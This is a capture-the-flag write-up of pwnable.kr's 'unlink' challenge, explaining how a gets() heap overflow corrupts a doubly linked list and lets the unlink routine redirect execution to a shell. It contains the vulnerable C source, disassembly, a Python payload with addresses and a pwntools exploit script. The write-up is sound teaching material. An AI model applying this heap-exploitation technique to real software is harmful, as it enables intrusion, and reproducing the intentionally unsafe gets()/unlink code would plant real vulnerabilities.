Unlink - Pwnable.kr
Linked lists are the bread and butter of programmers. Even if you are not aware of that, your program is probably using this data type somewhere. Linked lists come in many flavors: simples, circulars, doubles, xor lists, etc…
The goal of this challenge is to exploit a heap overflow which gives us complete control over the content of the nodes of a double linked list.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
typedef struct tagOBJ{
struct tagOBJ* fd;
struct tagOBJ* bk;
char buf[8];
}OBJ;
void shell(){
system("/bin/sh");
}
void unlink(OBJ* P){
OBJ* BK;
OBJ* FD;
BK=P->bk;
FD=P->fd;
FD->bk=BK;
BK->fd=FD;
}
int main(int argc, char* argv[]){
malloc(1024);
OBJ* A = (OBJ*)malloc(sizeof(OBJ));
OBJ* B = (OBJ*)malloc(sizeof(OBJ));
OBJ* C = (OBJ*)malloc(sizeof(OBJ));
// double linked list: A <-> B <-> C
A->fd = B;
B->bk = A;
B->fd = C;
C->bk = B;
printf("here is stack address leak: %p\n", &A);
printf("here is heap address leak: %p\n", A);
printf("now that you have leaks, get shell!\n");
// heap overflow!
gets(A->buf);
// exploit this unlink!
unlink(B);
return 0;
}
Cool, thanks to the evil function gets
we can overwrite the content of the heap starting from the address of A->buf
. Here is a first limit: because of gets
we must avoid newline characters in our payload.
After the heap overflow, our goal will be to exploit the function unlink
. When a node is unlinked the previous and following nodes get linked back together (note that while the implementation of unlink
proposed in this code would work perfectly for node B
, it will fail and cause the program to crash if applied to A
or C
).
Now, let’s analyze a little bit more in detail the situation. When B
gets unlinked two things happen:
- The node pointed by
B->fd
(originallyC
) will change itsbk
value toB->bk
(originallyA
) - The node pointed by
B->bk
(originallyA
) will change itsfd
value toB->fd
(originallyC
)
I wrote “originally” because we have full control over the values of B->bk
and B->fd
.
My first impression while reading this challenge was:
“Ah that’s easy, I will just make B->bk point to the return address on the stack and overwrite it with the address of ‘shell’ which I will write into B->fd”
It turns out I was wrong…things are much more interesting.
Here is the problem: if we write the address of the function shell
directly into B->fd
or B->bk
then the function unlink
will try to write at this same address and guess what, so far I never saw a program where the section .text
was in a segment with write permissions!
To recap our constraint is the following: B->fd
and B->bk
must always point to a writable zone of the program. Through the function unlink
we should be able to write a word (4 bytes) somewhere in the program, assuming that the value that we write is a legal “writable” address.
We can for example use this technique to write somewhere in the stack the address to which B->fd
is pointing but we shall not forget that the value of B->bk
will be written 4 bytes after the address pointed by B->fd
.
1
2
3
4
5
6
7
8
9
10
11
12
HEAP +---------------------+
B | |
+--------------------+-+--+----+------------+v---+----+------+
| | fd | bk | | | bk | |
+--------------------+----+-+--+------------+----+----+------+
|
|
STACK |
|
+-------------------------+-v--+-----------------------------+
| | fd | |
+-------------------------+----+-----------------------------+
The 4 bytes directly pointed by B->fd
will not be overwritten so thanks to the heap overflow, we can have full control on their value. In short, in this way we are able to write on the stack an address which is pointing to 4 bytes that we can control, not bad no? Usually this is enough to redirect the flow of a program, so let’s have a look at the instructions to see if we can somehow use our “evil-address” on the stack to obtain an exploit.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
;-- unlink:
0x08048504 55 push ebp
0x08048505 89e5 mov ebp, esp
0x08048507 83ec10 sub esp, 0x10
0x0804850a 8b4508 mov eax, dword [ebp + 8]
0x0804850d 8b4004 mov eax, dword [eax + 4]
0x08048510 8945fc mov dword [ebp - 4], eax
0x08048513 8b4508 mov eax, dword [ebp + 8]
0x08048516 8b00 mov eax, dword [eax]
0x08048518 8945f8 mov dword [ebp - 8], eax
0x0804851b 8b45f8 mov eax, dword [ebp - 8]
0x0804851e 8b55fc mov edx, dword [ebp - 4]
0x08048521 895004 mov dword [eax + 4], edx
0x08048524 8b45fc mov eax, dword [ebp - 4]
0x08048527 8b55f8 mov edx, dword [ebp - 8]
0x0804852a 8910 mov dword [eax], edx
0x0804852c 90 nop
0x0804852d c9 leave
0x0804852e c3 ret
At the end of the function unlink
we got only a normal epilogue with leave
and ret
. We could use the leave
instruction to pop into ebp
our controlled address. If we control ebp
we can control esp
as well, e.g. we could move the value of ebp
to esp
with a leave
instruction and then wait for a ret
to redirect the execution to the address written on the 4 bytes pointed by esp
. So let’s see what instructions are executed after unlink
has returned.
1
2
3
4
5
6
7
0x080485f2 e80dffffff call sym.unlink
0x080485f7 83c410 add esp, 0x10
0x080485fa b800000000 mov eax, 0
0x080485ff 8b4dfc mov ecx, dword [ebp - 4]
0x08048602 c9 leave
0x08048603 8d61fc lea esp, [ecx - 4]
0x08048606 c3 ret
Something interesting happens here (see highlighted lines). The content of the value on the stack at address ebp - 4
is copied into ecx
. Before returning the value ecx - 4
is assigned to esp
thus the program will return at the address written at ecx - 4
.
Ok, let’s use this to our advantage. If we overwrite the value on the stack at ebp - 4
with an address on the heap, then the execution flow will be redirected to whatever is written 4 bytes before what’s pointed by that address. As we have full control over the heap we can write the address of shell
at that point.
Ok let’s do that!
- First, we need to overwrite
B->bk
with the addressebp - 4
.
Thanks to the leaks we have the stack address ofA
which corresponds toebp - 0x14
, we can just add 0x10 to obtain the value that we want. - Second, we need
B->fd
to be equal to an address on the heap that we can control, plus 4 bytes. We can useA->buf
which address is equal to&A + 8
, (we already know the value of&A
) in this caseB->fd = &A + 8 + 4
. - At last, we just need to write the address of the function
shell
(which is at0x80484eb
) atA->buf
.
Using a debugger we can calculate that B = A->buf + 16
, as the address of the function shell
already takes 4 bytes we need to insert a span of just 12 bytes after that in order to reach B
.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
HEAP
A A->buf B
+---------+-----+----------+----------+-----------+------+
| |shell| | A->buf+4 | &A + 0x10 | |
+---------+-----+----------+----------+----+------+------+
|<- 0x10 bytes ->| |
|
STACK |
&A ebp-0x4 |
+--------------------+---+------------+----v-----+-------+
| | A | | A->buf+4 | |
+--------------------+---+------------+----------+-------+
|<- 0x10 bytes ->|
Let’s use two terminals: one to execute the program and another one to prepare the input. In the first terminal I executed multiple time the command cat
inside a subshell in order to be able to control the input flow of the program. The first cat
is used to block the program before injecting the payload, the second is used to inject the payload and the third will let us interact with the shell.
1
2
3
4
unlink@ubuntu:~$ (cat -; cat /tmp/mypayload; cat -) | ./unlink
here is stack address leak: 0xffb3dbb4
here is heap address leak: 0x87fe410
now that you have leaks, get shell!
Now we can calculate the payload and write it into a file.
1
unlink@ubuntu:~$ python -c "print '\xeb\x84\x04\x08' + 'A'*12 + '\x1c\xe4\x7f\x08' + '\xc4\xdb\xb3\xff'" > /tmp/mypayload
After pressing Ctrl-D the payload is sent to the input and we get access to a shell.
1
2
3
4
5
6
unlink@ubuntu:~$ (cat -; cat /tmp/mypayload; cat -) | ./unlink
here is stack address leak: 0xffb3dbb4
here is heap address leak: 0x87fe410
now that you have leaks, get shell!
cat flag
conditional_*****_what_*****_from_******_explo1t
NOTE: Probably you noticed a weird malloc(1024);
in the code. This is not just a case: after our exploit the esp
register will point into the heap, that big malloc is there to make sure that we have enough allocated space on the heap (which will be our new stack) to execute the function shell
.
Intended solution
Once got a privileged shell we can read the intended solution. The script below uses pwntools, a very practical exploitation framework written in python.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
from pwn import *
context.arch = 'i386' # i386 / arm
r = process(['/home/unlink/unlink'])
leak = r.recvuntil('shell!\n')
stack = int(leak.split('leak: 0x')[1][:8], 16)
heap = int(leak.split('leak: 0x')[2][:8], 16)
shell = 0x80484eb
payload = pack(shell) # heap + 8 (new ret addr)
payload += pack(heap + 12) # heap + 12 (this -4 becomes ESP at ret)
payload += '3333' # heap + 16
payload += '4444'
payload += pack(stack - 0x20) # eax. (address of old ebp of unlink) -4
payload += pack(heap + 16) # edx.
r.sendline( payload )
r.interactive()
The intended solution is a bit different from the one I described in this article. It exploits the leave
instruction at the end of the function unlink
. The address of the stored ebp
minus 4 is written into B->fd
so that the value of the stored ebp
will be overwritten with the content of B->fd
. After the instruction leave
the register ebp
contains the address heap + 16
, which written into B->bk
. Finally the epilogue of the function main
will first load into ecx
the value at heap + 12
, then it will load into esp
the address of the function shell
(lea esp, [ecx - 4]
) so that main
will return into shell
.